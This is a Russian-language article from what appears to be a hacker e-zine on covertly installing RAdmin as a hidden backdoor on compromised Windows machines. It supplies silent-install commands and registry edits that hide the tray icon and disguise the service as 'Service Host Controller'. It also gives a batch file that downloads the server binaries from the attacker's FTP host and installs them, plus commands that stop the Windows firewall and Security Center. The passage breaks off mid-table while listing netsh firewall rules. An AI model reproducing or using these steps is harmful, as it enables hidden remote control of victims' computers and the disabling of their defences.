<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Mazafaka.Ru E-zine :: Articles ::</title>
<style type="text/css">
<!--
.style2 {
	font-size: large;
	font-family: "Courier New", Courier, mono;
	font-weight: bold;
}
.style7 {font-family: "Courier New", Courier, mono}
-->
</style>
</head>

<body background="img/bgf.jpg">
<table width="900"  border="0" align="center">
  <tr>
    <th width="150" scope="col">&nbsp;</th>
    <th width="600" scope="col"><div align="center"><img src="img/radmin.jpg" width="600" height="143"></div></th>
    <th width="150" scope="col">&nbsp;</th>
  </tr>
  <tr>
    <td width="150">&nbsp;</td>
    <td width="600" bgcolor="#CCCCCC"><p><span class="style7"><strong>0&#1093;01. &#1048;&#1085;&#1090;&#1088;&#1086;</strong><br>
      -----------</span></p>
      <p class="style7"> &#1055;&#1086;&#1089;&#1083;&#1077;&#1076;&#1085;&#1077;&#1077; &#1074;&#1088;&#1077;&#1084;&#1103; &#1091;&#1095;&#1072;&#1089;&#1090;&#1080;&#1083;&#1080;&#1089;&#1100; &#1087;&#1088;&#1086;&#1089;&#1100;&#1073;&#1099; &#1085;&#1072; &#1092;&#1086;&#1088;&#1091;&#1084;&#1072;&#1093; &#1086; &#1087;&#1086;&#1084;&#1086;&#1097;&#1080; &#1079;&#1072;&#1082;&#1088;&#1077;&#1087;&#1080;&#1090;&#1100;&#1089;&#1103; &#1085;&#1072; Windows-&#1084;&#1072;&#1096;&#1080;&#1085;&#1072;&#1093;, 
      &#1076;&#1072; &#1080; &#1074; ICQ &#1087;&#1086;&#1095;&#1077;&#1084;&#1091;-&#1090;&#1086; &#1089;&#1087;&#1088;&#1072;&#1096;&#1080;&#1074;&#1072;&#1102;&#1090; &#1074;&#1086;&#1087;&#1088;&#1086;&#1089;&#1099; &#1080;&#1084;&#1077;&#1085;&#1085;&#1086; &#1090;&#1072;&#1082;&#1086;&#1075;&#1086; &#1088;&#1086;&#1076;&#1072;...&#1080; &#1080;&#1084;&#1077;&#1085;&#1085;&#1086; &#1087;&#1088;&#1086; RAdmin. &#1055;&#1086;&#1101;&#1090;&#1086;&#1084;&#1091;,
      &#1095;&#1090;&#1086;&#1073;&#1099; &#1085;&#1077; &#1086;&#1073;&#1100;&#1103;&#1089;&#1085;&#1103;&#1090;&#1100; &#1082;&#1072;&#1078;&#1076;&#1086;&#1084;&#1091; &#1095;&#1090;&#1086; &#1082; &#1095;&#1077;&#1084;&#1091;, &#1103; &#1088;&#1077;&#1096;&#1080;&#1083; &#1086;&#1073; &#1101;&#1090;&#1086;&#1084; &#1085;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100;...<br>
&#1048;&#1090;&#1072;&#1082;... &#1057;&#1086;&#1074;&#1077;&#1088;&#1096;&#1077;&#1085;&#1085;&#1086; &#1085;&#1077; &#1074;&#1072;&#1078;&#1085;&#1086; &#1082;&#1072;&#1082; &#1074;&#1099; &#1087;&#1086;&#1083;&#1091;&#1095;&#1080;&#1083;&#1080; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1082; &#1084;&#1072;&#1096;&#1080;&#1085;&#1077; &#1089; &#1054;&#1057; Windows (&#1083;&#1086;&#1082;&#1072;&#1083;&#1100;&#1085;&#1086; &#1080;&#1083;&#1080;
&#1091;&#1076;&#1072;&#1083;&#1105;&#1085;&#1085;&#1099;&#1084; &#1089;&#1087;&#1083;&#1086;&#1081;&#1090;&#1086;&#1084;), &#1074;&#1072;&#1078;&#1085;&#1086; &#1095;&#1090;&#1086; &#1091; &#1074;&#1072;&#1089; &#1077;&#1089;&#1090;&#1100; &#1087;&#1086;&#1090;&#1088;&#1077;&#1073;&#1085;&#1086;&#1089;&#1090;&#1100; &#1074; &#1087;&#1086;&#1089;&#1083;&#1077;&#1076;&#1091;&#1102;&#1097;&#1077;&#1084; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100; &#1088;&#1077;&#1089;&#1091;&#1088;&#1089;&#1099;
&#1080;/&#1080;&#1083;&#1080; &#1076;&#1072;&#1085;&#1085;&#1099;&#1077; &#1101;&#1090;&#1086;&#1081; &#1084;&#1072;&#1096;&#1080;&#1085;&#1099;. &#1057;&#1087;&#1086;&#1089;&#1086;&#1073;&#1086;&#1074; &#1086;&#1089;&#1090;&#1072;&#1074;&#1080;&#1090;&#1100; &#1089;&#1077;&#1073;&#1077; &#1083;&#1072;&#1079;&#1077;&#1105;&#1082;&#1091; &#1084;&#1085;&#1086;&#1078;&#1077;&#1089;&#1090;&#1074;&#1086;... &#1086;&#1090; &#1073;&#1080;&#1085;&#1076;&#1072; &#1087;&#1086;&#1088;&#1090;&#1072; &#1076;&#1086;
&#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1082;&#1080; &#1090;&#1088;&#1086;&#1103;&#1085;&#1086;&#1074;. &#1054;&#1076;&#1080;&#1085; &#1080;&#1079; &#1084;&#1085;&#1086;&#1075;&#1080;&#1093; - &#1101;&#1090;&#1086; &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1082;&#1072; RAdmin. &#1055;&#1088;&#1080;&#1089;&#1090;&#1091;&#1087;&#1080;&#1084;.
      </p>
      <p class="style7"><strong>0&#1093;02. &#1058;&#1077;&#1086;&#1088;&#1080;&#1103;</strong><br>
        ------------</p>
      <p class="style7"> &#1044;&#1072;-&#1076;&#1072;... &#1080;&#1084;&#1077;&#1085;&#1085;&#1086; &#1090;&#1077;&#1086;&#1088;&#1080;&#1103;, &#1090;&#1072;&#1082; &#1082;&#1072;&#1082; &#1074;&#1099;&#1103;&#1089;&#1085;&#1080;&#1083;&#1086;&#1089;&#1100; &#1095;&#1090;&#1086; &#1084;&#1085;&#1086;&#1075;&#1080;&#1077; &#1083;&#1102;&#1076;&#1080; &#1085;&#1077;&#1079;&#1085;&#1072;&#1102;&#1090; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1085;&#1086;&#1081; &#1086;&#1073;&#1086;&#1083;&#1086;&#1095;&#1082;&#1080; 
      &#1080; &#1095;&#1090;&#1086; &#1090;&#1072;&#1082;&#1086;&#1077; *.bat-&#1092;&#1072;&#1081;&#1083;&#1099;. &#1048;&#1079; &#1076;&#1072;&#1085;&#1085;&#1086;&#1081; &#1086;&#1073;&#1083;&#1072;&#1089;&#1090;&#1080; &#1085;&#1072;&#1076;&#1086; &#1093;&#1086;&#1090;&#1103; &#1073;&#1099; &#1079;&#1085;&#1072;&#1090;&#1100; &#1082;&#1072;&#1082; &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;&#1089;&#1103; FTP &#1095;&#1077;&#1088;&#1077;&#1079; 
        cmd.exe =) &#1055;&#1088;&#1080;&#1076;&#1091;&#1084;&#1099;&#1074;&#1072;&#1090;&#1100; &#1085;&#1080;&#1095;&#1077;&#1075;&#1086; &#1085;&#1077; &#1085;&#1072;&#1076;&#1086;, &#1074;&#1086;&#1090; &#1093;&#1101;&#1083;&#1087;:</p>
      <p class="style7">&#1057;&#1080;&#1085;&#1090;&#1072;&#1082;&#1089;&#1080;&#1089;:</p>
      <p class="style7">ftp [-v] [-d] [-i] [-n] [-g] [-s:&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072;] [-a] [-w:&#1088;&#1072;&#1079;&#1084;&#1077;&#1088;] [-A] [&#1042;&#1077;&#1076;&#1086;&#1084;&#1099;&#1081; &#1082;&#1086;&#1084;&#1087;&#1100;&#1102;&#1090;&#1077;&#1088;]</p>
      <p class="style7">... &#1080;&#1079; &#1087;&#1072;&#1088;&#1072;&#1084;&#1077;&#1090;&#1088;&#1086;&#1074; &#1085;&#1072;&#1084; &#1087;&#1086;&#1085;&#1072;&#1076;&#1086;&#1073;&#1080;&#1090;&#1089;&#1103; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086;:</p>
      <p class="style7">-v = &#1047;&#1072;&#1087;&#1088;&#1077;&#1097;&#1072;&#1077;&#1090; &#1074;&#1099;&#1074;&#1086;&#1076; &#1085;&#1072; &#1101;&#1082;&#1088;&#1072;&#1085; &#1086;&#1090;&#1074;&#1077;&#1090;&#1072; FTP-&#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;;<br>
        -n = &#1047;&#1072;&#1087;&#1088;&#1077;&#1097;&#1072;&#1077;&#1090; &#1072;&#1074;&#1090;&#1086;&#1084;&#1072;&#1090;&#1080;&#1095;&#1077;&#1089;&#1082;&#1080;&#1081; &#1074;&#1093;&#1086;&#1076; &#1074; &#1089;&#1080;&#1089;&#1090;&#1077;&#1084;&#1091; &#1074; &#1093;&#1086;&#1076;&#1077; &#1085;&#1072;&#1095;&#1072;&#1083;&#1100;&#1085;&#1086;&#1075;&#1086; &#1087;&#1086;&#1076;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1080;&#1103;;<br>
        -s:&#1080;&#1084;&#1103;_&#1092;&#1072;&#1081;&#1083;&#1072; = &#1059;&#1082;&#1072;&#1079;&#1099;&#1074;&#1072;&#1077;&#1090; &#1090;&#1077;&#1082;&#1089;&#1090;&#1086;&#1074;&#1099;&#1081; &#1092;&#1072;&#1081;&#1083; &#1089; ftp-&#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;&#1084;&#1080;. <br>
&#1069;&#1090;&#1080; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1103;&#1102;&#1090;&#1089;&#1103; &#1072;&#1074;&#1090;&#1086;&#1084;&#1072;&#1090;&#1080;&#1095;&#1077;&#1089;&#1082;&#1080; &#1087;&#1086;&#1089;&#1083;&#1077; &#1079;&#1072;&#1087;&#1091;&#1089;&#1082;&#1072; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099; ftp. ;</p>
      <p class="style7">&#1058;&#1072;&#1082;&#1078;&#1077; &#1089;&#1086;&#1074;&#1077;&#1090;&#1091;&#1102; &#1087;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1089;&#1087;&#1088;&#1072;&#1074;&#1082;&#1091; &#1087;&#1086; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1072;&#1084; - REG ADD, netsh firewall, net stop/start, &#1095;&#1090;&#1086;&#1073;&#1099; 
      &#1093;&#1086;&#1090;&#1103;&#1073;&#1099; &#1087;&#1086;&#1085;&#1080;&#1084;&#1072;&#1090;&#1100;, &#1095;&#1090;&#1086; &#1084;&#1099; &#1073;&#1091;&#1076;&#1077;&#1084; &#1076;&#1077;&#1083;&#1072;&#1090;&#1100; &#1076;&#1072;&#1083;&#1077;&#1077;...
      </p>
      <p class="style7"><strong>0&#1093;03. &#1055;&#1088;&#1086;&#1094;&#1077;&#1089;&#1089; &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1082;&#1080;</strong><br>
        -----------------------</p>
      <p class="style7"> &#1055;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;&#1089;&#1103; &#1073;&#1091;&#1076;&#1077;&#1084; RAdmin'&#1086;&#1084; 2.1 &#1048;&#1079; &#1074;&#1089;&#1077; &#1082;&#1091;&#1095;&#1080; &#1092;&#1072;&#1081;&#1083;&#1086;&#1074; &#1085;&#1072;&#1084; &#1085;&#1091;&#1078;&#1085;&#1099; &#1090;&#1086;&#1083;&#1100;&#1082;&#1086;: <br>
        r_server.exe, AdmDll.dll, raddrv.dll. &#1042;&#1086;&#1090; &#1095;&#1090;&#1086; &#1085;&#1072;&#1087;&#1080;&#1089;&#1072;&#1085;&#1086; &#1074; &#1093;&#1101;&#1083;&#1087;&#1077;:</p>
      <p class="style7">Usage: r_server.exe options</p>
      <p class="style7">Options:</p>
      <p class="style7">/setup - show window dialog box with setup settings (install,remove,port,pass)<br>
        /pass:xxxxx - specify a password<br>
        /port:xxxxx - specify a port number<br>
        /install - install service (Win95/98 or WinNT) and driver (WinNT)<br>
        /uninstall - uninstall service and driver, if present<br>
        /save - save pass &amp; port to the defau lt program settings in the registry if you not<br>
  specify port or\and pass when use this option, default port or\and empty <br>
  password will be saved. <br>
  /silence - dont show message boxes,in /install, /uninstall or /save commands.<br>
  /unregister - delete an already entered key for Radmin.<br>
  /? - this help screen </p>
      <p class="style7">Note, that port and password specified in the command prompt,<br>
        always overrides default settings from the registry.</p>
      <p class="style7">&#1054;&#1090;&#1089;&#1102;&#1076;&#1072; &#1074;&#1080;&#1076;&#1085;&#1086;, &#1095;&#1090;&#1086; &#1076;&#1083;&#1103; &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1082;&#1080; RAdmin'a &#1074; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1085;&#1086;&#1081; &#1089;&#1090;&#1088;&#1086;&#1082;&#1077; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1086; &#1085;&#1072;&#1073;&#1088;&#1072;&#1090;&#1100;:</p>
      <p class="style7">CMD&gt;r_server.exe /install /silence<br>
        CMD&gt;r_server.exe /port:&#1087;&#1086;&#1088;&#1090; /pass:&#1087;&#1072;&#1088;&#1086;&#1083;&#1100; /save /silence</p>
      <p class="style7">&#1042;&#1089;&#1105;... RAdmin &#1091;&#1089;&#1090;&#1072;&#1085;&#1086;&#1074;&#1083;&#1077;&#1085; &#1080; &#1077;&#1075;&#1086; &#1084;&#1086;&#1078;&#1085;&#1086; &#1080;&#1089;&#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1100;. &#1053;&#1054;! &#1053;&#1072; &#1076;&#1072;&#1085;&#1085;&#1086;&#1084; &#1101;&#1090;&#1072;&#1087;&#1077; &#1086;&#1085; &#1089;&#1083;&#1080;&#1096;&#1082;&#1086;&#1084; &#1079;&#1072;&#1084;&#1077;&#1090;&#1077;&#1085;<br>
      &#1080;&#1079;-&#1079;&#1072; &#1080;&#1082;&#1086;&#1085;&#1082;&#1080; &#1074; &#1090;&#1088;&#1101;&#1077;. &#1044;&#1083;&#1103; &#1090;&#1086;&#1075;&#1086; &#1095;&#1090;&#1086;&#1073;&#1099; &#1077;&#1105; &#1091;&#1073;&#1088;&#1072;&#1090;&#1100; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1086; &#1076;&#1086;&#1073;&#1072;&#1074;&#1080;&#1090;&#1100; &#1074; &#1088;&#1077;&#1077;&#1089;&#1090;&#1088; &#1085;&#1077;&#1089;&#1082;&#1086;&#1083;&#1100;&#1082;&#1086;<br>
      &#1082;&#1083;&#1102;&#1095;&#1077;&#1081;:</p>
      <p class="style7">&#1042; [HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters] - &#1082;&#1083;&#1102;&#1095; &quot;DisableTrayIcon&quot;, &#1090;&#1080;&#1087; - REG_BINARY,<br>
&#1079;&#1085;&#1072;&#1095;&#1077;&#1085;&#1080;&#1077; - 00000001.<br>
&#1042; [HKLM\SYSTEM\CurrentControlSet\Services\r_server] - &#1082;&#1083;&#1102;&#1095; &quot;DisplayName&quot;, &#1090;&#1080;&#1087; - REG_SZ,<br>
&#1079;&#1085;&#1072;&#1095;&#1077;&#1085;&#1080;&#1077; - &quot;Service Host Controller&quot;.</p>
      <p class="style7">&#1057;&#1076;&#1077;&#1083;&#1072;&#1090;&#1100; &#1101;&#1090;&#1086; &#1084;&#1086;&#1078;&#1085;&#1086; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1072;&#1084;&#1080;:</p>
      <p class="style7">CMD&gt;REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f<br>
        CMD&gt;REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d &quot;Service Host Controller&quot; /f      </p>
      <p class="style7"><strong>0&#1093;04. &#1040;&#1074;&#1090;&#1086;&#1084;&#1072;&#1090;&#1080;&#1079;&#1072;&#1094;&#1080;&#1103;</strong><br>
        -------------------</p>
      <p class="style7"> &#1042;&#1089;&#1105; &#1101;&#1090;&#1086;, &#1082;&#1086;&#1085;&#1077;&#1095;&#1085;&#1086;, &#1093;&#1086;&#1088;&#1086;&#1096;&#1086;, &#1085;&#1086; &#1079;&#1072;&#1085;&#1080;&#1084;&#1072;&#1077;&#1090; &#1085;&#1077;&#1082;&#1086;&#1090;&#1086;&#1088;&#1086;&#1077; &#1074;&#1088;&#1077;&#1084;&#1103;. &#1055;&#1086;&#1101;&#1090;&#1086;&#1084;&#1091; &#1073;&#1099;&#1083;&#1086; &#1073;&#1099; &#1085;&#1077;&#1087;&#1083;&#1086;&#1093;&#1086;,<br>
      &#1089;&#1086;&#1082;&#1088;&#1072;&#1090;&#1080;&#1090;&#1100; &#1082;&#1086;&#1083;&#1080;&#1095;&#1077;&#1089;&#1090;&#1074;&#1086; &#1076;&#1077;&#1081;&#1089;&#1090;&#1074;&#1080;&#1081;. &#1044;&#1083;&#1103; &#1101;&#1090;&#1086;&#1075;&#1086; &#1085;&#1072;&#1087;&#1080;&#1096;&#1077;&#1084; *.bat-&#1092;&#1072;&#1081;&#1083; &#1087;&#1088;&#1080;&#1084;&#1077;&#1088;&#1085;&#1086; &#1090;&#1072;&#1082;&#1086;&#1075;&#1086; &#1089;&#1086;&#1076;&#1077;&#1088;&#1078;&#1072;&#1085;&#1080;&#1103;:</p>
      <p class="style7">@echo off<br>
        echo open [Adress_FTP]&gt;ra.pif // [Adress_FTP] - &#1072;&#1076;&#1088;&#1077;&#1089;&#1089; FTP-&#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1072;<br>
        echo [user] [pass] a&gt;&gt;ra.pif // [user] - &#1083;&#1086;&#1075;&#1080;&#1085;, [pass] - &#1087;&#1072;&#1088;&#1086;&#1083;&#1100;<br>
        echo binary&gt;&gt;ra.pif<br>
        echo GET AdmDll.dll [Path]\AdmDll.dll&gt;&gt;ra.pif //<br>
        echo GET raddrv.dll [Path]\raddrv.dll&gt;&gt;ra.pif // [Path] - &#1087;&#1091;&#1090;&#1100; &#1082; &#1092;&#1072;&#1081;&#1083;&#1072;&#1084;<br>
        echo GET r_server.exe [Path]\r_server.exe&gt;&gt;ra.pif //<br>
        echo bye&gt;&gt;ra.pif<br>
        ftp -v -n -s:ra.pif<br>
        c:\windows\r_server.exe /install /silence<br>
        c:\windows\r_server.exe /pass:123 /save /silence<br>
        REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f<br>
        REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d &quot;Service Host Controller&quot; /f<br>
        c:\windows\r_server.exe /stop<br>
        c:\windows\r_server.exe /start      </p>
      <p class="style7"><strong>0&#1093;05. &#1059;&#1090;&#1080;&#1083;&#1080;&#1079;&#1072;&#1094;&#1080;&#1103; &#1092;&#1072;&#1081;&#1088;&#1074;&#1086;&#1083;&#1072;</strong><br>
        -------------------------</p>
      <p class="style7"> &#1063;&#1072;&#1089;&#1090;&#1086; &#1073;&#1099;&#1074;&#1072;&#1077;&#1090; &#1090;&#1072;&#1082;, &#1095;&#1090;&#1086; &#1085;&#1072; &#1084;&#1072;&#1096;&#1080;&#1085;&#1077; &#1074;&#1082;&#1083;&#1102;&#1095;&#1105;&#1085; &#1092;&#1072;&#1077;&#1088;&#1074;&#1086;&#1083;&#1083; (&#1087;&#1091;&#1089;&#1090;&#1100; &#1076;&#1072;&#1078;&#1077; &#1089;&#1090;&#1072;&#1085;&#1076;&#1072;&#1088;&#1090;&#1085;&#1099;&#1081;) &#1080; &#1086;&#1085; &#1085;&#1072;&#1084;
      &#1084;&#1077;&#1096;&#1072;&#1077;&#1090;. &#1042; &#1089;&#1083;&#1091;&#1095;&#1072;&#1077; &#1089; Windows &#1091; &#1085;&#1072;&#1089; &#1077;&#1089;&#1090;&#1100; 2 &#1087;&#1091;&#1090;&#1080;: &#1086;&#1090;&#1082;&#1083;&#1102;&#1095;&#1090;&#1100; &#1077;&#1075;&#1086; &#1083;&#1080;&#1073;&#1086; &#1076;&#1086;&#1073;&#1072;&#1074;&#1080;&#1090;&#1100; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1099;&#1077; 
      &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072;. &#1056;&#1072;&#1089;&#1089;&#1084;&#1086;&#1090;&#1088;&#1080;&#1084; &#1082;&#1072;&#1078;&#1076;&#1099;&#1081; &#1080;&#1079; &#1085;&#1080;&#1093; &#1074; &#1086;&#1090;&#1076;&#1077;&#1083;&#1100;&#1085;&#1086;&#1089;&#1090;&#1080;.<br>
&#1048;&#1090;&#1072;&#1082;, &#1082;&#1072;&#1082; &#1078;&#1077; &#1086;&#1090;&#1082;&#1083;&#1102;&#1095;&#1080;&#1090;&#1100; &#1089;&#1090;&#1072;&#1085;&#1076;&#1072;&#1088;&#1090;&#1085;&#1099;&#1081; &#1092;&#1072;&#1077;&#1088;&#1074;&#1086;&#1083;&#1083;? &#1042; &#1054;&#1057; Windows &#1092;&#1072;&#1077;&#1088;&#1074;&#1086;&#1083;&#1086;&#1084; &#1103;&#1074;&#1083;&#1103;&#1077;&#1090;&#1089;&#1103; - &#1089;&#1083;&#1091;&#1078;&#1073;&#1072; 
&quot;&#1041;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088; Windows/&#1054;&#1073;&#1097;&#1080;&#1081; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1082; &#1048;&#1085;&#1090;&#1077;&#1088;&#1085;&#1077;&#1090;&#1091; (ICS)&quot; &#1080;&#1083;&#1080; &#1087;&#1086;-&#1087;&#1088;&#1086;&#1089;&#1090;&#1086;&#1084;&#1091; - sharedaccess.<br>
&#1054;&#1089;&#1090;&#1072;&#1085;&#1072;&#1074;&#1083;&#1080;&#1074;&#1072;&#1077;&#1090;&#1089;&#1103; &#1086;&#1085; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1086;&#1081;:</p>
      <p class="style7">CMD&gt;NET STOP &quot;&#1041;&#1088;&#1072;&#1085;&#1076;&#1084;&#1072;&#1091;&#1101;&#1088; Windows/&#1054;&#1073;&#1097;&#1080;&#1081; &#1076;&#1086;&#1089;&#1090;&#1091;&#1087; &#1082; &#1048;&#1085;&#1090;&#1077;&#1088;&#1085;&#1077;&#1090;&#1091; (ICS)&quot;<br>
      &#1083;&#1080;&#1073;&#1086;<br>
        CMD&gt;NET STOP sharedaccess</p>
      <p class="style7">&#1085;&#1086; &#1090;&#1091;&#1090; &#1077;&#1089;&#1090;&#1100; &#1089;&#1074;&#1086;&#1080; &#1085;&#1102;&#1072;&#1085;&#1089;&#1099;... &#1087;&#1088;&#1080; &#1087;&#1086;&#1087;&#1099;&#1090;&#1082;&#1077; &#1086;&#1090;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1080;&#1103; &#1101;&#1090;&#1086;&#1081; &#1089;&#1083;&#1091;&#1078;&#1073;&#1099; - &#1087;&#1086;&#1083;&#1100;&#1079;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100; &#1087;&#1086;&#1083;&#1091;&#1095;&#1080;&#1090;
      &#1089;&#1086;&#1086;&#1073;&#1097;&#1077;&#1085;&#1080;&#1077; &#1089; &#1087;&#1088;&#1077;&#1076;&#1091;&#1087;&#1088;&#1077;&#1078;&#1076;&#1077;&#1085;&#1080;&#1077;&#1084; &#1086; &#1085;&#1077;&#1073;&#1077;&#1079;&#1086;&#1087;&#1072;&#1089;&#1085;&#1086;&#1089;&#1090;&#1080; &#1101;&#1090;&#1086;&#1075;&#1086; &#1076;&#1077;&#1081;&#1089;&#1090;&#1074;&#1080;&#1103;. &#1069;&#1090;&#1086; &#1085;&#1077;&#1087;&#1088;&#1080;&#1077;&#1084;&#1083;&#1077;&#1084;&#1086;! &#1057;&#1083;&#1077;&#1076;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1086; 
      &#1085;&#1091;&#1078;&#1085;&#1086; &#1089;&#1076;&#1077;&#1083;&#1072;&#1090;&#1100; &#1090;&#1072;&#1082; &#1095;&#1090;&#1086;&#1073;&#1099; &#1101;&#1090;&#1086;&#1075;&#1086; &#1085;&#1077; &#1087;&#1088;&#1086;&#1080;&#1079;&#1086;&#1096;&#1083;&#1086;. &#1047;&#1072; &#1074;&#1099;&#1076;&#1072;&#1095;&#1091; &#1090;&#1072;&#1082;&#1080;&#1093; &#1089;&#1086;&#1086;&#1073;&#1097;&#1077;&#1085;&#1080;&#1081; &#1086;&#1090;&#1074;&#1077;&#1095;&#1072;&#1077;&#1090; &#1089;&#1083;&#1091;&#1078;&#1073;&#1072; 
      &quot;&#1062;&#1077;&#1085;&#1090;&#1088; &#1086;&#1073;&#1077;&#1089;&#1087;&#1077;&#1095;&#1077;&#1085;&#1080;&#1103; &#1073;&#1077;&#1079;&#1086;&#1087;&#1072;&#1089;&#1085;&#1086;&#1089;&#1090;&#1080;&quot; (&#1087;&#1086;-&#1087;&#1088;&#1086;&#1089;&#1090;&#1086;&#1084;&#1091; - wscsvc). &#1057; &#1083;&#1077;&#1076;&#1086;&#1074;&#1072;&#1090;&#1077;&#1083;&#1100;&#1085;&#1086; &#1087;&#1077;&#1088;&#1077;&#1076; &#1086;&#1090;&#1082;&#1083;&#1102;&#1095;&#1077;&#1085;&#1080;&#1077;&#1084; &#1092;&#1072;&#1077;&#1088;&#1072;, &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1086; &#1086;&#1090;&#1082;&#1083;&#1102;&#1095;&#1080;&#1090;&#1100; &#1101;&#1090;&#1091; &#1089;&#1083;&#1091;&#1078;&#1073;&#1091; &#1086;&#1076;&#1085;&#1086;&#1081; &#1080;&#1079; &#1076;&#1074;&#1091;&#1093; 
      &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;:</p>
      <p class="style7">CMD&gt;NET STOP &quot;&#1062;&#1077;&#1085;&#1090;&#1088; &#1086;&#1073;&#1077;&#1089;&#1087;&#1077;&#1095;&#1077;&#1085;&#1080;&#1103; &#1073;&#1077;&#1079;&#1086;&#1087;&#1072;&#1089;&#1085;&#1086;&#1089;&#1090;&#1080;&quot;<br>
      &#1083;&#1080;&#1073;&#1086;<br>
        CMD&gt;NET STOP wscsvc</p>
      <p class="style7">&#1058;&#1077;&#1087;&#1077;&#1088;&#1100; &#1087;&#1077;&#1088;&#1077;&#1081;&#1076;&#1105;&#1084; &#1082; &#1073;&#1086;&#1083;&#1077;&#1077; &#1101;&#1083;&#1077;&#1075;&#1072;&#1085;&#1090;&#1085;&#1086;&#1084;&#1091; &#1084;&#1077;&#1090;&#1086;&#1076;&#1091; - &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1102; &#1085;&#1077;&#1086;&#1073;&#1093;&#1086;&#1076;&#1080;&#1084;&#1086;&#1075;&#1086; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; &#1076;&#1083;&#1103; &#1092;&#1072;&#1077;&#1088;&#1072;. 
      &#1042; Win XP SP2 &#1084;&#1086;&#1076;&#1080;&#1092;&#1080;&#1094;&#1080;&#1088;&#1086;&#1074;&#1072;&#1090;&#1100; &#1080; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1087;&#1088;&#1072;&#1074;&#1080;&#1083;&#1072; &#1084;&#1086;&#1078;&#1085;&#1086; &#1082;&#1086;&#1084;&#1084;&#1072;&#1085;&#1076;&#1086;&#1081; netsh firewall.      &#1042;&#1086;&#1090; &#1085;&#1077;&#1073;&#1086;&#1083;&#1100;&#1096;&#1072;&#1103; &#1089;&#1087;&#1088;&#1072;&#1074;&#1082;&#1072;:</p>
      <table width="100%"  border="0" bgcolor="#FFFFCC">
        <tr>
          <th width="33%" class="style7" scope="col"><div align="left">&#1043;&#1088;&#1091;&#1087;&#1087;&#1072;</div></th>
          <th width="44%" class="style7" scope="col"><div align="left">&#1050;&#1086;&#1084;&#1072;&#1085;&#1076;&#1072;</div></th>
          <th width="23%" class="style7" scope="col"><div align="left">&#1054;&#1087;&#1080;&#1089;&#1072;&#1085;&#1080;&#1077;</div></th>
        </tr>
        <tr>
          <td class="style7"><p>&#1044;&#1086;&#1073;&#1072;&#1074;&#1083;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1085;&#1092;&#1080;&#1075;&#1091;&#1088;&#1072;&#1094;&#1080;&#1080;</p>
          </td>
          <td class="style7">netsh firewall add allowedprogram<br>netsh firewall add portopening</td>
